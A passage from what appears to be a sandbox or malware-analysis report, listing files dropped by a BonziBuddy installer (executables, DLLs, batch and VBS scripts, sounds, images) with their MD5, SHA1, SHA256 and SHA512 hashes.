| SHA256 | 2836a35937ad987bd9ddba33162136d71bcbaba0ad6d9b1930a412961b3a3523 |
| SHA512 | eafeda44eb25ed88e9ba286d18586c56c7e6e0d09930606306ad1cbc778a4c82cf167ec8dee045633ce480dbed954e8519614692f1fd458a8429a60de9f0e359 |
C:\Program Files (x86)\BonziBuddy432\BonziBUDDY_Killer.exe
| MD5 | 913d38cb9d132c8c92b21cff05a7eb62 |
| SHA1 | eb829ea4de07193edb16d8c0196426919c452d42 |
| SHA256 | 6d80bd5a3d5ec6630e9a411a978c8e2c196f530f6a5b580fa982c5ad1622bd0c |
| SHA512 | 9b154d60352e864722c8f1ae0c0d0d4dcca670a47daea9b13b58a8cfd4f8c9275cebc6e51d755de77025e1a10115a2ac09416f273a44ead4a0c742f14e0e9d5d |
C:\Users\Admin\AppData\Local\Temp\$inst\temp_0.tmp
| MD5 | 409b922a28e0fefc32c3e4c2f5fc03c7 |
| SHA1 | ed19ea09a0844de834c36e561f9c3b0215a6314d |
| SHA256 | 6d92aa1027f45feaa436dfe2c32ecc926cf26c7f673586467f595a6d7076ca67 |
| SHA512 | d0178b45ea61d45725e0765845532f57e11c99a9e87da85e2d17add87ef501dd4719f19e8d40481496c46cfbcb92352dd66f3e63bc568995ab78aafcc6b6f9da |
C:\Program Files (x86)\BonziBuddy432\BonziCTB.dll
| MD5 | 6a4c7d730aed29b0405b03e128c1655a |
| SHA1 | 1dbb8dbbe7bac39196f7697486a36dedf59b31f1 |
| SHA256 | f85525a3ebe334f7403f031ec47c2b32461650224223ee728107dce0e879ea93 |
| SHA512 | 212ebd6b0cfa2500add4813860c74288e83a606676bcba837d500ac30960c10cbf1da25c7f7c526cf9953ea619f8a3244dc1d5fdccb1c1577b271e37289ecd7f |
C:\Program Files (x86)\BonziBuddy432\Bonzi's Solitaire.vbw
| MD5 | 9b909f17e524b7fa854ad4709dbc349a |
| SHA1 | c66425f2082a88bbb248287128a1cda3a2fe7ade |
| SHA256 | f8cae184ce04d906e348ff795aa20f6ac26e45ee41fa3de16c6985b291e3fdc4 |
| SHA512 | 7124b6a8e66633c9fd1fcf006528db117de605ba7378b69fa6c7096f01a9f6d5757093a40e196d3e6b987a3ed4e96fed531ba05971974cd3143205d31e540dde |
C:\Program Files (x86)\BonziBuddy432\Bonzi's Solitaire.exe
| MD5 | 493d8bee27d448c45f39a244fcf8eb62 |
| SHA1 | 0acc859294d50fd2b49e0393b7699a552695d1a1 |
| SHA256 | fe97b317d345fb3e708087ebf27a50c539f66fc77c7b6895825f564c9fefc4c6 |
| SHA512 | c670f8cd182ef8a87daa8f1269868eda8d7ef96549c3c5d16325fc86a2272540aa8a1e12b7d7a12256ad67f421e8f2d5f416d72ebae5779e964ac6bf3ba209f6 |
C:\Program Files (x86)\BonziBuddy432\empop3.dll
| MD5 | a0fdd2077934c34f08d48aa214da2c4e |
| SHA1 | 9b9593ef99515aac8665c6da73deb871815d73e9 |
| SHA256 | f198ec842cf9b9d1e9e3f4bb6864fae7eea98d6919e0c6609e139e00c262d6bc |
| SHA512 | 2bef50a54f8c06821e31771bac566992f7a8872709b8a993322a43750f19ccad773dd9fd88f87d819d317845ccfe1b66087c2b2bda094b3382e6054ccce2f62a |
C:\Program Files (x86)\BonziBuddy432\CHORD.WAV
| MD5 | e913f3f2201c09d938c63f10dc535bb1 |
| SHA1 | 1e326ad6d1c2c538c429235006e0fa64f9aeec9d |
| SHA256 | 1cdb5e4d203f61e94c02f5eea5008289fb463c02174879887fc62574b34c12d3 |
| SHA512 | 0838a26ee0d918cad1cec431ecd1ebe431f559951ccb85161823d234ae4157f0699d903af178b4af2d70046b04b29509bf1691f57c021f8f63dce579cbece233 |
C:\Program Files (x86)\BonziBuddy432\favicon.ico
| MD5 | e1a53bb79bcf97ae324b05552c1b3ca9 |
| SHA1 | 5ee16e7d9fb3473df37f1c318881a59b1bf2d9ef |
| SHA256 | d5343ff39d29ecd9b60fd31cc60321b2d4a36001d5d1ee24f6c766b10eef0095 |
| SHA512 | 1c8ac8b9a9e8e063f572c41ce9a7aac91dcf956763859716fa68247c3774cca00bf5aebd5dae3dfe6c0ef1a961cf640f7ad3c68965ec9d8b5e0d610b77c29c80 |
C:\Program Files (x86)\BonziBuddy432\emsmtp.dll
| MD5 | 365920b74d38322571e16f66686ef56b |
| SHA1 | d4a112bcc048526d1e6b7a6841c059c63d23d4f6 |
| SHA256 | 743857c8be216893265c231ad45f4ffd3babb67c024ef8ceb5a698e292464263 |
| SHA512 | f13a913e09b467a929fb25da3fce4c9eded9571c2f43d6a9365de4e86f4183434d643c32f35e5ee4b8d7798b5aa24beaf3898d61e92daa4df35f0a31ea338164 |
C:\Program Files (x86)\BonziBuddy432\Intro2.wav
| MD5 | 125f1998a1e8fd06bb02f6168b0445fa |
| SHA1 | d65ff4d8a79e47122ba872ee3f4986df7827766a |
| SHA256 | 1d648a27a0209959027567f793f8b3fd18a103b64e62eda3f20f11192bd0dfaa |
| SHA512 | 62cf29c85efff23449f2cf0985c1eb5d71111bf5332e6932129ab9e9ec4d2fbf819851fbb9ea73946c24fa6a1715d1aea6eef58c5e52de340128a4aaf5267c56 |
C:\Program Files (x86)\BonziBuddy432\j3.nbd
| MD5 | 0b9550caef707aebf17f4c17a7e0f424 |
| SHA1 | 06d91cae8ea9324f76b7828d2d2e9455ba2c6c7b |
| SHA256 | 197cd5e9b3bdec70314d3b3e5ddb5ee41578907a8a50d9ad2fc3683ff271656f |
| SHA512 | d1cfda4b4d82a7cb0571e4c70dc5b8f4b2b19406364568a45e18dd68dfeeb1f37f4237b43448b0d1d12cfd388f54bd2d5f9390510593173c0dbcfddafcf18735 |
C:\Program Files (x86)\BonziBuddy432\j3.nbd-SR
| MD5 | 4c273ee71a2d85203ca95387fa78a315 |
| SHA1 | 195a066b030685b1fb8b5e594f6a77889a1ff3ab |
| SHA256 | 2a9cbdbd1459111eac43d2d505e7828108c68cc5042c97b4e93d235962f8ad59 |
| SHA512 | 6e833e069f410d73976c97031b61949cfc31e81df7363e724090f13a5a2306496a1a15aa3ee01fa1cff43cf91d37d191c84be293ebf6ae7c1c5c3b55cee06724 |
C:\Program Files (x86)\BonziBuddy432\j2.nbd-SR
| MD5 | 6f8c402777457a1cc7b7ca6f7a7657de |
| SHA1 | b05c00f28f9185ffd43c9ee479976382c64adbfe |
| SHA256 | 1837a9f0653a4093e448de37fdbf2bb0e4c3e98abb1414b8e60793a2863208a9 |
| SHA512 | 777d34f5e4e24c4f053050a99e00c6a7065bb89690c542362eadce7552c71005b6a7de0fdb20eeacece70610c900a1d51b6485332971d598e6c0dc475b228bda |
C:\Program Files (x86)\BonziBuddy432\j2.nbd
| MD5 | 788b0ec30cc5fae75d2a6ee0a3ef10fa |
| SHA1 | a879dc350bbe79dc2cae04ee804fd6ee9a1f8e1b |
| SHA256 | c032c71a49e0cb05072602c99251e6b1d76ca2db57120fc402b93d3392df7c3c |
| SHA512 | df5e1097db5326c168b0c840b2d598f82caab5138d30f899233a777e7164b8178e4ba9934eb0c32029533b6ee5f72c07fa279fcd93f8e11d4108485724abac1b |
C:\Program Files (x86)\BonziBuddy432\J001.nbd-SR
| MD5 | 35c46be741382648dbc6c7241d1f7148 |
| SHA1 | 24fea5f70e437ecd40a37035d2e1ca3df293d0db |
| SHA256 | 56ac8a4f90686b433297712de577ba68e0970458dee218764ed3acb3b3560f7b |
| SHA512 | ebbacc846af47d3e955a43291626470c73296c874b7d80f0021ec577922f29f453ab5794925b6372b8a75b732677d7c27c16c1f8728ee60a57c66dc4a6c4d86e |
C:\Program Files (x86)\BonziBuddy432\j001.nbd
| MD5 | 98c9159b828cbcd8f13a0491218bf537 |
| SHA1 | 6b9a736cb7840300e56acd2cbc635d5e451a68ff |
| SHA256 | e312728e0491e1a15405566c8f591cf3ca6128ca17e5e022a7550494a600ad27 |
| SHA512 | 9d07bdd0b7fbc3e23c6940c72e5e151271c61b703f0f6d858e81887fd4819f9574e4bc078bef8e2c3c9c661793884f98cc6305556f34d0092c6ce7c657aa16f8 |
C:\Program Files (x86)\BonziBuddy432\Jigsaw.exe
| MD5 | 7958433a470290855e19ab23af9ceec8 |
| SHA1 | 0240679dc940a51545ec484c130f15bc2077c0f2 |
| SHA256 | c3dfadbe670df02d784aa9db249303d253ecd18a720299c9ab4e8968ba240e57 |
| SHA512 | 988a317864996eebcf0ca5b72ecc86b3ea091c34db6f064d8f3100c9aabc7da08caf2d722485c1be0d1420e65ed977833ae8dc38ab84a7400bf9c06c5daf83fd |
C:\Program Files (x86)\BonziBuddy432\msvcrt.dll
| MD5 | 055b02d711cdedb8c5997274c4e99cb8 |
| SHA1 | 5c816eeb6e4d5f1c11e9f56c992ee7d452e7c0f9 |
| SHA256 | d7cea69a98579d928e534070f5293e80ed7df38baf611b20717ef55aa1344a18 |
| SHA512 | 4774431fe768e424f46c833236a41d68f05d98ed14353b04428a5d190dbe213bb56087a5e5cca5cd98598f2c1611fddfed3a7a79bbd362bc02e586cc367907c0 |
C:\Program Files (x86)\BonziBuddy432\ODKOB32.DLL
| MD5 | 94f66cd6a18efdb663a61f2025ab31c5 |
| SHA1 | 527afb33ff31f5ad1e60225081db34ad5083454b |
| SHA256 | c4b58c78dc14e247ba303f630e42e9e56667dafef7aba1f0fdfd058b658f0a36 |
| SHA512 | e4c14a7db92c9c7b10950ee52f34be73138ced3873962dc5a875949c533d187dc2251b0d37e6f855d54018b8662b63a611b1f0a71fb5c4744444dbf86492ed1e |
C:\Program Files (x86)\BonziBuddy432\P001.nbd-SR
| MD5 | 307f2e464cf4e0bb93fbf82037102e14 |
| SHA1 | b35f620a6dd2d0b5d04d669d4e2bb65c9c41363e |
| SHA256 | 3e8554436a52336c84117905b7b2383fe1aef01d613440d4cea70f035aaee28b |
| SHA512 | d03df59f9ebd5040ec5f6fbd5c1e426d8f4881d61ac0e98423c26d39a56b170da6a3cde6bd231209739c9a89224220514371bab2ebc38f8d9e6d86c4a76721b8 |
C:\Program Files (x86)\BonziBuddy432\p001.nbd
| MD5 | 89baf0ce132d54517f89e6fdebb6764f |
| SHA1 | 41509f6bce097e434651148a36012cd8c66da2d7 |
| SHA256 | 6e39e8b14ac5a0dad47279595406a49c61c6748f16f4e69dd48738653e50882f |
| SHA512 | 2b3d3fe6dc4bddc34005cbf461f27e10e7a330aba645dd27ce787bc79ff28e9627abd3adce27bc8741ed160ceda9c22fa0c62d9faa16454d6700437eb72a6e6b |
C:\Program Files (x86)\BonziBuddy432\msvbvm60.dll
| MD5 | 5343a19c618bc515ceb1695586c6c137 |
| SHA1 | 4dedae8cbde066f31c8e6b52c0baa3f8b1117742 |
| SHA256 | 2246b4feae199408ea66d4a90c1589026f4a5800ce5a28e583b94506a8a73dce |
| SHA512 | 708d8a252a167fa94e3e1a49e2630d07613ff75a9a3e779a0c1fcbec44aa853a68c401f31a2b84152f46a05f7d93f4e5e502afc7a60236a22ac58dea73fa5606 |
C:\Program Files (x86)\BonziBuddy432\Reg.nbd
| MD5 | 7c70fdb75615a12b46140d8e708b7fa6 |
| SHA1 | d2b5fe00939a1a53e249b7892b1d7d18f66adf45 |
| SHA256 | 03b3858e5766b07b919d176b541a105faf76e1a28ba01e3593cc319ad87dc3b6 |
| SHA512 | 632568205be861f532da9bac3f423306f44ab6b8874c1a8dd5872534afbb809081c861bff6fe041a2d7296a627f7a988059989dc58f0ba3b4162439525695b3d |
C:\Program Files (x86)\BonziBuddy432\RACREG32.DLL
| MD5 | 4e86f6e372d5f823e457ee5358b46079 |
| SHA1 | 75bf76ac7de2a577532965c121aa0478076eace0 |
| SHA256 | 054fbd3c3a31cea5c69c78c1455d19d2f3486e07428ea951f107d5dac3e58d25 |
| SHA512 | 73b55608c748479ddd4cbdb2046488972bc2e9340e8c6fe6cf9d0d9badb344de9f5e7ed66f508c47db402d9479066d7f0f4644ba6551cec6318a5a5a468e5087 |
C:\Program Files (x86)\BonziBuddy432\s1.nbd
| MD5 | 4e4d3a1400a1d0bcf482fc8da711ccba |
| SHA1 | 751769e1582ce3a057ba6fb0270698a2a48d5dae |
| SHA256 | abad946feed68057f15569c0df432790b0c19a21149c8f07ecfc99fac2311616 |
| SHA512 | 13b04814456172ea858c220c36d0c066286965a2bcd217c0216788e3fb84ecc1c007ed8f44124a368400b858af584a2fff855919cb7bb3fb195da39abb0e675a |
C:\Program Files (x86)\BonziBuddy432\sites.nbd
| MD5 | a8e5c2cef7e455ce4f6cdd601ac774bb |
| SHA1 | 0ebe0f1ddbdcaee08d4a5505b6f8a329022e554d |
| SHA256 | 5a8749440d441766dba442097d5956cd7bfc0f3bb1fb46d431df341bba1a2778 |
| SHA512 | 186a9146263011c70dd8c342956564163c4d496b938842eb2c06382464ab9aef73e5cf87dd70ee2d8177d61c1ccb3fb71510b5064b18a014b394322859fd7c3b |
C:\Program Files (x86)\BonziBuddy432\speedup.ico
| MD5 | 6c9011742ff814f765779df48147fa58 |
| SHA1 | 5519c010b4af11452d126439d9e670ef68c77057 |
| SHA256 | aebda70076ae40f99896ee71d5a476444e91974a215663161b6b1d89faa3ab2c |
| SHA512 | 766005a4cfd5edb960346316725c1c4e427042118e1b702c0a67552b8c2de3a376ccd1422e0db0a8f955642a7e2686c70a266f01362bd17afefcea9823ce5d70 |
C:\Program Files (x86)\BonziBuddy432\Snd2.wav
| MD5 | bd183af23b343b2789e61f03b536aad0 |
| SHA1 | 66db4748e6214fdc4642e3f9a6bc4218b24ec5b4 |
| SHA256 | d59c9bc27494b2e68d5efdc1798dc5442f364bef46cfb1fcdf4b3b032358ac26 |
| SHA512 | ad5191eddb6838ea7b9200bc7a10c06e0a41966ba627a52ccd5a4f1008b1b85edfc63939a264822b7e1e9caf40e3428ddaaaaa80c82bb5066afe802d0dc52211 |
C:\Program Files (x86)\BonziBuddy432\Snd1.wav
| MD5 | 7cf6069d29b9a66bf03ba1e554553fe9 |
| SHA1 | 001de4b7b9082f951e782efb74601d8e0447bee6 |
| SHA256 | 11863d5b7fec50e3ca69f74066b68ed389a18b6990394f3ed21d6ea0e67262e5 |
| SHA512 | 51414f0165ea67fcd96d0a5b2df1b321882145d3d3dcb146a0d896a3a0c395b2538cb01b7c27ce106acf65480d88bc5d2aba19e9ad03430bd756c5047f33d08d |
C:\Program Files (x86)\BonziBuddy432\SSubTmr6.dll
| MD5 | 1556c5b52a751c31b4ca6fe757704131 |
| SHA1 | a04263b37b69a5a53eaccc6d30dda61b2808224a |
| SHA256 | 48bb226b418dae999d66731599996e042c5592d845ea11548a15ccd3a00fb5ab |
| SHA512 | ea306e09834bd08edf8a5930c096eaff4ab6c6a8799f3910ab8ea88a0a25fde45de36887c13d468046e9bb2e1439e7bd34c970e3ef9f71d8e4eeb95b5fd60074 |
C:\Program Files (x86)\BonziBuddy432\t001.nbd
| MD5 | 15a02eb5a83be1c01ff9579f2ce06aed |
| SHA1 | 1c8ed5541fb243602e963759ea4d284b9842000f |
| SHA256 | b30e7a66488327c0cf090ae98eece036f326c7f5b2ffa9f9cac3bf7df3e7af47 |
| SHA512 | 06a562d88eeb6ddd8c056df834bc8d0e02bba501c417f9a2531761492233e0f07d17ba65602c6acac2bdcbb463bd6aedba2f397b5b707bc64565958b78f27472 |
C:\Program Files (x86)\BonziBuddy432\t2.nbd
| MD5 | 3a538baefe6893b4997ffcd25f339329 |
| SHA1 | c2d3e1f16c663c435735cf27a6e114f5b2f85df7 |
| SHA256 | 87d531d27e9987f39934b0f093542790f25882c9e6e20ca554ca0405a16a4acf |
| SHA512 | e9eed3c7a0b9935e769b56d430fc6081e63f97a7d9d0df0b1913220cc0519223353ecc48b3dcc4a0147f77741d0367c0ba9b8d9a56645c1f03524399155c8c50 |
C:\Program Files (x86)\BonziBuddy432\t3.nbd-SR
| MD5 | d58e9150a9a022012c421bb8229385d3 |
| SHA1 | 9c1ecb6c18cddf731003e805914534635b0476b5 |
| SHA256 | a994e2ea053542543b647dc81d6e0aa7fc7585311b77f5fd76e13b1bd73a67cf |
| SHA512 | 90ae9db622ed832adcab70aab7833ee8eae4f18b006b89d5982586fb492a797f7ea0e5cdefde16b6929168f0db80ff56d49a39c53ac744e4e3487ef84d44f7cb |
C:\Program Files (x86)\BonziBuddy432\t3.nbd
| MD5 | 132adcfde600f76d5f9e4e8d45b5d936 |
| SHA1 | 619164a1f95d6f5c8286fa2ea7ab5513c6d4bb2b |
| SHA256 | 94c638be958f83325f9b96303e050383881959f509bc6c4afacd890db3755672 |
| SHA512 | b3bfa48570fc472846ae11712616ba63c6fef5994f04d463ae06cac6dbe5bb19ce43816b0c4b15ec37bc537c8c24d747757df116dade99d2f3c42f0f312a021a |
C:\Program Files (x86)\BonziBuddy432\T001.nbd-SR
| MD5 | 877bd06f8b02ff562dd476306d8bb8a9 |
| SHA1 | ae4198c145e9d69e122f3a387519194d4280a089 |
| SHA256 | 2f3d5ac26d4345be684f81cae8aa51f116334394680e9e6ac6a6ec49f58f3bac |
| SHA512 | e8fa96008c4aaca4c4251bfb310c14a4501aa59b02827e68e91013f4089bd7e20a498923046bc4469985703c94b3c116da890270f0a806431601db605a840fc4 |
C:\Program Files (x86)\BonziBuddy432\BG\Bg1.bmp
| MD5 | 1b360ab50e93b123ab13f036d5c76f45 |
| SHA1 | f274fe317961cab9f2d9a8bf558e7734d7a7a338 |
| SHA256 | e4843ab74d29d608e406d137892afced0661ee56c3cd899cf49bc863dfc9e99a |
| SHA512 | e23a7c7394944482a94c6a56fb875def9b51e44b4ed0dff907ed57cc1d681ee8dc878c2a14b3b34793c4afbe8ccbb54258281d37fa2d90bf066c2365e0f8471a |
C:\Program Files (x86)\BonziBuddy432\BG\Bg2.bmp
| MD5 | c7263e35b3e47b805356e06cbca930dc |
| SHA1 | 4dc3f33674bd914c86a4608aaf0a65b91df86e3b |
| SHA256 | 2066f7ede6410b790ee3446b6c27470526969eb837ab9187f61c10c611bdcc5f |
| SHA512 | 5732403c83678f0b582e8940c00e94a5e0376e80263b5ae804cb7cff18108a3c69ada76af66fb331cb67c0d89d4129bae28c17f3a91230eaf4717f6cbe7ef2e9 |
C:\Program Files (x86)\BonziBuddy432\BG\Bg3.bmp
| MD5 | fe0a9cbbb8b168c7f13b1669d2fbd801 |
| SHA1 | ca3eab96c7fe48fe27086941fc2c09549473e0d7 |
| SHA256 | d983ff82ee546e5706da39531aff69721b9896fc99eacd59bfaeefdd0bef0147 |
| SHA512 | 59b3ada28a58795eabafe4b998062c6b5d27b3d370687666341fedc66f53e5ff5e8833b0eb378826fcc1a775706fcdba0dc1e4b99451aef8fb4aec6b1a3d8b3a |
C:\Program Files (x86)\BonziBuddy432\Runtimes\actcnc.exe
| MD5 | cbbe2893fe0c4a6ce7eee46c373ea0a3 |
| SHA1 | 87af6b4d460fb9567a0d66d920cb8538be3c27c9 |
| SHA256 | b4694750c1151663750e131ffd9b989a3b81818059b6d60dc279ecac966644e1 |
| SHA512 | fddc675d451812125d9026320d92ac561081790e721b2e3b85d992ed6bf861c16a550049edb115c64e15672d1c799361758adb8d6e33f9192329dc8604955b72 |
C:\Program Files (x86)\BonziBuddy432\Options\ManualDirPatcher.bat
| MD5 | 510937646168fa292f9485cefc3cd4fd |
| SHA1 | 8c70a305ebf5af333c5def9f4e9e9d0bb596d4d2 |
| SHA256 | 999a70147a3115502d5b47c2bebb6731b2cffaba93be49502034eba06034f412 |
| SHA512 | 244cbd347becd971b5da1e1909a0870003a4a96d811208f1d528df43b43de2a6e5a61ce9ced00690b67a2556a5a566cd3057214df8f3cea4dd8675e8b1726864 |
C:\Program Files (x86)\BonziBuddy432\Options\ManualDirPatcher.vbs
| MD5 | c594e329508a06ba5e89adf59821f9e3 |
| SHA1 | 093a43a53d0129f5f04ed5bb48dc09ff21eb1a00 |
| SHA256 | 56e8d6f1006029624a8fb9b09cdd59f137eace19a122b82608e047613792de76 |
| SHA512 | c8cfa8560ed0ccb534a7b9626ea3b7dad13aae6f73276416a7f0183d0aed942f8d9f4b19eef7c64493983440603e1bde8e18428e0f93c5d5dc11dd947ee008f9 |
C:\Program Files (x86)\BonziBuddy432\Options\fix.bat
| MD5 | 00403d6181d3bc1782b9e2108d372d56 |
| SHA1 | bfca4357e50788b265d616b446664fe8ea9646b5 |
| SHA256 | 11c81b5638de403ab4bc1cb7299f7d46cc68da7c608dc971be6ff984c7391b8c |
| SHA512 | 3895c40d018673663f1262f04f8962376f4d1e71753562afc4eedcdeb1ee4dd92bbe56b9f1dea5c4f45884e53c046b7dc919b6e87d1548198be2b9baf1dceb90 |
C:\Program Files (x86)\BonziBuddy432\Options\chose.bat
| MD5 | 81b125b8da6edaf2f80ff3b90eea5981 |
| SHA1 | a9c9271e1ecaaf7fac491b3afc16e8a19eb9da5e |
| SHA256 | c191c970e39a53ae342515302c3bb1579ef5247ef76e8d2eb948000f2e5e0261 |
| SHA512 | 75d5dcc3e31a3d5e607365c4c46a9694b9c002037437a1c75ea3cefd8170f4e7e7ec8246224df26118eec2f9dd6e6891dd59e4d23fa56c9b6ac0ab76c4d4a550 |
C:\Program Files (x86)\BonziBuddy432\Options\CheckRuntimes.bat
| MD5 | 2966b9e9451b773573200add659bd660 |
| SHA1 | 86d0a8f276abfb0f418a5b809e6733d8215ead4d |
| SHA256 | 18ee11dc6a159dbbab4f56c0a552fb3d8ab5c3c18fc1744516dfd1cb17a293d4 |
| SHA512 | c4fc45247a1068ac83eaad571f97077871ba2b7950dc8affe30759790633f09618ce92d4eafbc5e224b52ddc0118931afd72f6ed0be2b29db9224d865bf3394c |
C:\Program Files (x86)\BonziBuddy432\Options\bonzibuddys.URL
| MD5 | 34a3b31000b28910ccd2a759a885cc90 |
| SHA1 | a9a3f6c09af904036bd9607179ffcfe3c854b3ec |
| SHA256 | ce6634b06d190b964741fb8dc53dad631a1b001a46193567e0d66bb478713b8e |
| SHA512 | 8b2631718b65714df93672f1cf5bfb16f03c3240a85f13d8d0dfde8129af8bb030e81f07f1c63daec78701b1ea7a36ce82fe8a7fc548c4600bdd27dcbbb31961 |
C:\Program Files (x86)\BonziBuddy432\Options\BonziBuddy.bat
| MD5 | f24f62eeb789199b9b2e467df3b1876b |
| SHA1 | de3ac21778e51de199438300e1a9f816c618d33a |
| SHA256 | e596899f114b5162402325dfb31fdaa792fabed718628336cc7a35a24f38eaa9 |
| SHA512 | c2636ad578f7b925ee4cf573969d4ec6640de7b0176bf1701adece3a75937dc206ab1b8ee5343341d102c3bed1ec804a5c2a9e1222a7fb53a3cc02da55487329 |
C:\Program Files (x86)\BonziBuddy432\Options\AutoShortcutsMaker.vbs
| MD5 | 943e197d47fef0c8ff3bbdaac77388c4 |
| SHA1 | 51d0ee2cb206cdcb0169d492e6c8dd6c604bb124 |
| SHA256 | cbb7267266008da6d58707bdb91ee3c57bd208d0653a32a8e9b5a7f7080061ed |
| SHA512 | 5ad4e13e9cb321f9a23e2333d9dcc846fdf3d1b65291784fe310eb653122e17c55d48ffdab91b90f2c772411ca6c39de99f045a6f2375b5b140212db20f232a1 |
C:\Program Files (x86)\BonziBuddy432\Options\AutoDirPatcher.vbs
| MD5 | 159d5892d949c6f759b5b17e99d38494 |
| SHA1 | 4af96f926d6bacb966c8635239a9b3719007898b |
| SHA256 | 08583009a3ed2b1668f729edc48d7c8eeba302a7f42fb5c303a97dd38b747041 |
| SHA512 | d3b4b913c60caa32f9a2201011ce24c7118266396bf7db2bf5fece2a2614a879d75d13c15b273b863a29b52518a12661bca4064e39cef403b5fb2de1f52760ed |
C:\Program Files (x86)\BonziBuddy432\Options\AutoDirPatcher.bat
| MD5 | 51b0404cce6d36549605f5674ef09bf9 |
| SHA1 | 9fe00a443f136534667cff0bcdc4df1d5c033f30 |
| SHA256 | 11c57b03dd1a8bdce3f15d74af679df4f7091fcec57699a09b47c83bca35a1d9 |
| SHA512 | 49b2c8618da03690a62caf405a4e062e3bf28404b7f411fbadb8c4e686189447e16dd9d6ddda197ec8483226c630b02954d8207541a3ff18161a8ebffdcd6b57 |
C:\Program Files (x86)\BonziBuddy432\Runtimes\spchcpl.exe
| MD5 | 7506648bdb040a872901c74f7d057e90 |
| SHA1 | 70bc6be71d2930a50bf0f92cd732531bb6bf5f8c |
| SHA256 | 57858127f1a07233ccb4713bd29c860c9a7a201f2b8207ccfc91410478cce4b4 |
| SHA512 | 80b92f6d463452b4e9816f27e5482fd18f144216de9f719ca71e5736aea9c6561cce178a5718d3a0e3ff33f7a179833099a154963ec89ec37bf81ce92eca8af4 |
C:\Program Files (x86)\BonziBuddy432\Runtimes\spchapi.EXE
| MD5 | 46878602caa5debb728c0f740aeb45d6 |
| SHA1 | 63237b1c8b656712d00a1e60a062a738f376a95c |
| SHA256 | 7b05a46c786c91492d154683259c229aa9456286f688da18d4016d91625bebcc |
| SHA512 | 4b20b82a543d19932a1b32629b7af3f1dd820211e2350d5fe1ef66e07007fc0717919ec509b5ff6e1495f0511433763198689df4c820e08c3df0029ab74218b9 |
C:\Program Files (x86)\BonziBuddy432\Runtimes\Readme.txt
| MD5 | 5eab14a5391248bade4c546b26e04db9 |
| SHA1 | f00f4103914cced6aa612547542b7278b7661430 |
| SHA256 | b29f947446b61c80e8906be02b4793010aaaec5ab3c7538cc84cf0cb0b49631b |
| SHA512 | e18730a7bd2ee8fbb8c08c1258b0f7b39a7c0dec218f2c18bdc5f03dae7f8dcd31826af6373fbefcebed5e44b65ee8ae39d989756791ff9686115086813f7ae4 |
C:\Program Files (x86)\BonziBuddy432\Options\test.vbs
| MD5 | 9673c87fa79561cb2ce31ea780e12985 |
| SHA1 | b20a855defe4d05e2e6a74ee34d8188d44772c58 |
| SHA256 | a49357c09b87f39aa3e7c1560de48e2a070f315399bc7a7337f7fa75f8b8a455 |
| SHA512 | cd30be0ef65f02e5312ad330c3879dcb695fd6e68061792302908fe9ac35c0ff184a870eb9e67b3e942f0a624fafff9a4554c1e45c2136761b64a7efef7ff314 |
C:\Program Files (x86)\BonziBuddy432\Options\registry.reg
| MD5 | 06730e009063976e92ca3155dbe21542 |
| SHA1 | 1904d9b3aa4fbc3f2f21cca4bd15ab031767e84c |
| SHA256 | 80088f8bc82b3facca2daf7066e9cb78e4bf0aa81c57f77a500a75e137c0b411 |
| SHA512 | 98c9d5ce10ee66f533df8e8aaaee42aeee2475f3a7a9cc6fd4cf963313a5e85da154171e5f1f41024c4a3249f78fee946a0f2d3de69c80393562f6dc39e8fef4 |
C:\Program Files (x86)\BonziBuddy432\Options\uninstall.bat
| MD5 | a187448694701f15f5ac836a258cfa78 |
| SHA1 | b47137ef4b5613a8a0bc0fa3e3095177cdd2f35e |
| SHA256 | 8c2960f58beebab3b77bc4c705e06edd1620083ac9614368a4244dad7a4a89f7 |
| SHA512 | fcb16cd4fe4c009b01583111ea4f4e14d3fda17633af45b1283a562e12388ce16ff37690e5f9c5ea69c7955ce0f5880a099b08699ea1c8192452a9e89327a6c2 |
C:\Program Files (x86)\BonziBuddy432\Options\menu.bat
| MD5 | f04f8720e413478c181ba2cef8e4d384 |
| SHA1 | a19137dad529e68ebaed4fecfa9a9018c7ee9de3 |
| SHA256 | b65d7b112c124ab6f1927a72244160f83e7db7a5c948ec0b325f237a306db546 |
| SHA512 | b4d82e3f29f26c45c6533a56423c5770fff0217cc7237073e02df1a3a36716b54ac098aec83d64e1b1994350e1a0925b045a11ea6bba3a80c0fe94ebcde9d8e9 |
C:\Program Files (x86)\BonziBuddy432\Options\ManualShortcutsMaker.vbs
| MD5 | c33abdffe5e65874ee0ed59b40564cc0 |
| SHA1 | 48ba2360d6bd774acf7019bb92e85460ccfa5059 |
| SHA256 | 5c724387b4b1819a197b0d06b88394d7705a7311d17c8e29ac76e3b7439aac1d |
| SHA512 | fb8a22f15679341245a576077fc29fc0ea03577df1270382c8703b168af7b941bdd956adfc574a501cb771272d112e120934d7d4f45dadb6608c40cf53af4a83 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\book
| MD5 | 15ea0525b8eadba671e9d56306de1b01 |
| SHA1 | 056c306d935fffc9cd27e2db200c1efddc4155ad |
| SHA256 | 79acfe9005133be613baa6d85ff170ba9c4a7109d8dabd45cc5a39bf7f32b04a |
| SHA512 | 455b5b9daff01208df7a6cb2f24820130064dad73d8b34184a7f114f07221d2c5350c0e6b46ae5a0452db58fb95dfb27b20cfcaad1da2ecd9c03430f8b071966 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page0.jpg
| MD5 | 2f86991655a07f1e0ae608ae69c8de62 |
| SHA1 | 89885605155e2a4162bdb5bd0631e01e350d7608 |
| SHA256 | 4b0d3ac6305c56e814e87734d3798a4534b639fe7752a20bb398fa9eaf59bfd7 |
| SHA512 | 1843da571ee2ab31f6449e94698e51445e458829fe37b98c8967e9d3572a06811c12438f3b7cb8e908d95dd583429d69c524a50bdfd0390a84af0ccef5f2b552 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page1.jpg
| MD5 | 66fe43801d34b46bf67ed75989779010 |
| SHA1 | a5f48e93f10129ec8b0ae0b71a3901229d936fb4 |
| SHA256 | bc48c07bc245bb7a7561c983c72851bc2f48cae594472c48d3447456dcbea804 |
| SHA512 | 0c3ee73b3f1009140a5bbf8a07b059db37bdb30e673d46b87992541b4f96545f663b083c97926da7dbee053b5be557186aa9ea6e3a7deb2d511daa5f9f3e59da |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page11.jpg
| MD5 | deb89b81b2655a117454893c71cf39be |
| SHA1 | 1c573f99842e46abc56accd7cb4d7f4b0f93d063 |
| SHA256 | 1eec3c97c806459052a98661e0bfcdac4eafef0df5fd2af6c4c53916156e5eb1 |
